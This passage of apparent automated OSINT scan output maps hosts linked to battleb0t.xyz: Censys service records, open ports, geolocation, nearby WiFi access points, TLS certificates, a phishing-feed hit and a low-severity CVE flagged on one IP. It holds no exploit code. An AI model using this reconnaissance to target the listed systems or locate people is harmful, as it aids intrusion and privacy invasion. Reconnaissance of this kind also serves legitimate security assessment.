"id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:44:14 | Co-Hosted Site | No | SSL Certificate Analyzer | 3 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:1C:9A) | 37.780462,-122.390564 |
| 2023-05-12 03:24:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 403 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | omniblock (Net ID: 00:09:5B:E9:6B:D6) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | Germany | 46.101.229.70 |
| 2023-05-12 02:46:50 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 34.148.97.127 |
| 2023-05-12 02:45:58 | Physical Location | No | AbstractAPI | 1 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 64.226.81.43 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00yongshiwangzi.github.io]
https://www.openphish.com/feed.txt | 00yongshiwangzi.github.io |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2053 | 188.114.96.1 |
| 2023-05-12 03:09:24 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 64.226.81.43 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.173): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.133:80 | 185.199.110.0/24 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudflare.com |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://oldfluid.battleb0t.xyz/./script.js | https://oldfluid.battleb0t.xyz/ |
| 2023-05-12 02:47:30 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 104.21.6.166:80 | 104.21.6.166 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.255): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:56 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.111.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.108.0/22', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.111.153 |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T00:51:50.399Z", "ip": "172.67.135.9", "location_updated_at": "2023-04-28T23:58:12.936747Z", "autonomous_system_updated_at": "2023-05-06T01:54:19.985382Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"hubeitc.com": {"record_type": "A", "resolved_at": "2023-05-08T15:02:25.771434390Z"}, "sox.li": {"record_type": "A", "resolved_at": "2023-04-26T19:09:57.006302220Z"}, "www.oldthdoo.xyz": {"record_type": "A", "resolved_at": "2022-09-26T19:11:07.076925735Z"}, "outimpivutinli.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:57:31.066836981Z"}, "dhcp.pro": {"record_type": "A", "resolved_at": "2023-04-07T20:54:25.762591525Z"}, "interviewerinauguration.top": {"record_type": "A", "resolved_at": "2023-04-28T22:49:56.118650578Z"}, "www.lulucloud.top": {"record_type": "A", "resolved_at": "2023-05-01T02:54:57.371742635Z"}, "sufferwith.info": {"record_type": "A", "resolved_at": "2023-05-10T17:23:47.734514798Z"}, "pillsplusrx.com": {"record_type": "A", "resolved_at": "2022-12-02T13:59:11.413529095Z"}, "homesayofficial.com": {"record_type": "A", "resolved_at": "2023-05-08T14:59:56.576817191Z"}, "eraliser.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:10.208194848Z"}, "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:24.889964115Z"}, "onedollarglasses.org": {"record_type": "A", "resolved_at": "2023-05-09T01:43:37.823377424Z"}, "nzfortress.nz": {"record_type": "A", "resolved_at": "2022-12-07T17:06:16.407969123Z"}, "dmca.online": {"record_type": "A", "resolved_at": "2023-05-08T21:44:13.486013576Z"}, "webmail.healthcaringz.com": {"record_type": "A", "resolved_at": "2022-10-23T13:30:37.119563541Z"}, "cdn-2.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:24.840354602Z"}, "mynutrition365.com": {"record_type": "A", "resolved_at": "2023-01-28T13:41:29.917096426Z"}, "account-dev.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-23T16:34:50.737558857Z"}, "bezapach.site": {"record_type": "A", "resolved_at": "2022-11-17T16:10:10.763315118Z"}, "www.arquiteturasustentavel.arq.br.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-09-25T17:06:29.959927232Z"}, "welovemazda2.com": {"record_type": "A", "resolved_at": "2023-05-07T16:16:24.443322279Z"}, "nicksdevlab.com": {"record_type": "A", "resolved_at": "2023-05-05T15:10:48.612601219Z"}, "usbestsiding.com": {"record_type": "A", "resolved_at": "2023-05-02T23:18:02.110883898Z"}, "backup.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T13:53:19.633015199Z"}, "webmail.dynimighti.com": {"record_type": "A", "resolved_at": "2023-05-05T14:26:03.262859839Z"}, "www.kendalresearchgroup.eu.org": {"record_type": "A", "resolved_at": "2023-05-05T19:50:13.137718896Z"}, "locorfulb.cf": {"record_type": "A", "resolved_at": "2023-04-06T22:56:37.751080597Z"}, "wildanmaulana.cf": {"record_type": "A", "resolved_at": "2023-05-04T13:01:54.678346749Z"}, "obhkitchens.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T10:58:42.826529023Z"}, "www.bouncefitness.precisiongroup.com.au": {"record_type": "A", "resolved_at": "2023-04-26T12:25:18.625366391Z"}, "www.onedollarglasses.org": {"record_type": "A", "resolved_at": "2023-05-07T21:18:07.768786749Z"}, "dailyaid.com.co": {"record_type": "A", "resolved_at": "2023-04-28T13:15:27.402942692Z"}, "www.seribusenyum.org": {"record_type": "A", "resolved_at": "2023-02-04T17:32:21.980568714Z"}, "sanopoly.com": {"record_type": "A", "resolved_at": "2023-04-20T19:15:51.646804259Z"}, "www.palaciorentacar.com": {"record_type": "A", "resolved_at": "2023-04-30T20:48:31.555576583Z"}, "prefahoutesraismac.ga": {"record_type": "A", "resolved_at": "2023-05-10T17:09:09.762399021Z"}, "apps.codiotic.com": {"record_type": "A", "resolved_at": "2023-05-06T14:35:31.397147978Z"}, "gymnasie-portal.dk": {"record_type": "A", "resolved_at": "2023-05-08T17:28:07.281800383Z"}, "kmit17.com": {"record_type": "A", "resolved_at": "2023-01-29T13:41:58.275178074Z"}, "www.usbestsiding.com": {"record_type": "A", "resolved_at": "2023-05-11T16:20:14.776067678Z"}, "alfalahjamsolat.com": {"record_type": "A", "resolved_at": "2023-04-29T13:16:47.848315334Z"}, "www.homezing.com": {"record_type": "CNAME", "resolved_at": "2023-04-30T14:45:35.498801514Z"}, "diegobruno.com.br": {"record_type": "A", "resolved_at": "2023-05-11T12:30:51.038051198Z"}, "tavernolaincanto.altervista.org": {"record_type": "CNAME", "resolved_at": "2023-04-10T21:37:30.505399325Z"}, "crabcamkanawi.ml": {"record_type": "A", "resolved_at": "2023-04-29T18:29:51.293879545Z"}, "api.sanopoly.com": {"record_type": "A", "resolved_at": "2023-04-26T16:20:22.956402279Z"}, "mail.vertexhc.com": {"record_type": "A", "resolved_at": "2023-04-28T16:53:40.093346661Z"}, "www.typearound.com": {"record_type": "A", "resolved_at": "2023-05-03T15:59:44.822944002Z"}, "ketitarechesjunc.tk": {"record_type": "A", "resolved_at": "2023-05-05T20:23:13.362328225Z"}, "longchampcolombia.com": {"record_type": "A", "resolved_at": "2023-04-25T15:13:12.725728600Z"}, "totnewsgativime.ml": {"record_type": "A", "resolved_at": "2023-05-11T18:38:46.532739958Z"}, "credegtetandbeasump.tk": {"record_type": "A", "resolved_at": "2023-04-13T20:24:22.673256350Z"}, "tgtetv.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-12-01T13:53:19.785914421Z"}, "astrut-app.space": {"record_type": "A", "resolved_at": "2023-05-11T21:36:14.981867495Z"}, "cdg-sex-game.com": {"record_type": "A", "resolved_at": "2023-04-30T14:10:46.256225534Z"}, "www.jollygoodgames.com": {"record_type": "A", "resolved_at": "2023-05-07T14:57:18.867430647Z"}, "jagotekno.com": {"record_type": "A", "resolved_at": "2023-04-22T14:38:01.151568998Z"}, "ftp.jogjacontemporary.net": {"record_type": "A", "resolved_at": "2023-05-10T19:05:42.498201439Z"}, "cg.cncap.ca": {"record_type": "A", "resolved_at": "2023-04-29T12:44:12.255784234Z"}, "account.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-17T13:39:14.401013523Z"}, "hakertidircordbils.tk": {"record_type": "A", "resolved_at": "2023-04-24T22:20:31.002106199Z"}, "shop.geminibio.com": {"record_type": "A", "resolved_at": "2023-05-10T14:29:06.617280204Z"}, "esipdages.tk": {"record_type": "A", "resolved_at": "2022-12-24T16:43:56.993137478Z"}, "sibasi.co.ke": {"record_type": "A", "resolved_at": "2023-04-27T19:41:18.506582178Z"}, "mardederlohafi.cf": {"record_type": "A", "resolved_at": "2023-05-04T13:01:48.592242511Z"}, "seminare-steinbergerhof.com": {"record_type": "A", "resolved_at": "2022-11-11T13:47:58.476008549Z"}, "tufazy.com": {"record_type": "A", "resolved_at": "2023-04-26T16:50:54.989745065Z"}, "vpnexpert.nl": {"record_type": "A", "resolved_at": "2023-05-01T19:57:49.698948942Z"}, "cpanel.vertexhc.com": {"record_type": "A", "resolved_at": "2023-05-03T16:02:17.928893946Z"}, "ok-medicalbilling-ok.live": {"record_type": "A", "resolved_at": "2023-05-01T17:47:16.990114377Z"}, "video.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-05T18:22:43.709528638Z"}, "webdisk.healthcaringz.com": {"record_type": "A", "resolved_at": "2022-10-18T13:30:47.039752864Z"}, "tiomaichocannu.tk": {"record_type": "A", "resolved_at": "2022-12-08T16:58:01.532109086Z"}, "account-dev.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T18:30:39.855141477Z"}, "tgtetv.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-11T19:57:47.589434167Z"}, "ghappsherkverve.xyz": {"record_type": "A", "resolved_at": "2022-10-01T16:00:32.859129543Z"}, "kendalresearchgroup.eu.org": {"record_type": "A", "resolved_at": "2023-05-09T20:45:29.883376868Z"}, "trinityartistseries.org": {"record_type": "A", "resolved_at": "2022-12-29T16:31:11.663002382Z"}, "fastago.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-26T19:56:32.748547371Z"}, "login.sanopoly.com": {"record_type": "A", "resolved_at": "2023-04-22T00:18:08.415048164Z"}, "typearound.com": {"record_type": "A", "resolved_at": "2023-04-24T16:14:46.070651001Z"}, "vippulsar.com": {"record_type": "A", "resolved_at": "2022-11-29T14:13:25.682203427Z"}, "cpanel.jogjacontemporary.net": {"record_type": "A", "resolved_at": "2023-05-07T19:46:39.285928826Z"}, "4wdinfo.com": {"record_type": "A", "resolved_at": "2023-05-10T13:06:50.126601945Z"}, "mail.hlb.co.za": {"record_type": "A", "resolved_at": "2023-04-28T23:19:06.736816476Z"}, "therpsequavillicomp.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:57:55.402091890Z"}, "profmarpdust.gq": {"record_type": "A", "resolved_at": "2023-04-19T19:40:52.408802267Z"}, "mycleanersrock.com": {"record_type": "A", "resolved_at": "2022-11-23T16:19:42.997763435Z"}, "www.hlb.co.za": {"record_type": "A", "resolved_at": "2023-04-20T00:02:14.977582110Z"}, "prairducts.com": {"record_type": "A", "resolved_at": "2023-04-28T16:08:44.541097454Z"}, "kerzcoobamabasvio.cf": {"record_type": "A", "resolved_at": "2023-05-07T12:50:31.337450458Z"}, "emnotantfitmanas.ml": {"record_type": "A", "resolved_at": "2023-04-30T23:59:01.980378964Z"}, "latabke.tk": {"record_type": "A", "resolved_at": "2023-05-07T21:55:59.693650651Z"}, "www.thedot.cn.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-05T18:22:25.417735752Z"}, "seribusenyum.org": {"record_type": "A", "resolved_at": "2023-02-18T18:24:43.138880401Z"}, "octagonplastering.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-19T13:48:18.916628263Z"}, "account.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:40.329778906Z"}, "edericgakos.ml": {"record_type": "A", "resolved_at": "2023-02-27T16:49:01.824929419Z"}, "datenschlauch.de": {"record_type": "A", "resolved_at": "2023-05-02T23:34:28.039399648Z"}}, "names": ["webmail.dynimighti.com", "vpnexpert.nl", "cpanel.jogjacontemporary.net", "mardederlohafi.cf", "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net", "mail.vertexhc.com", "apps.codiotic.com", "datenschl | 172.67.135.9 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Omni (Net ID: 00:02:2D:17:C6:E0) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:44:21 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.110.153 |
| 2023-05-12 02:54:19 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 03:08:38 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.108.154 | 185.199.108.153 |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:8443 | 188.114.96.0/24 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://pics.battleb0t.xyz | pics.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Omni (Net ID: 00:02:2D:17:C6:E0) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:55:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
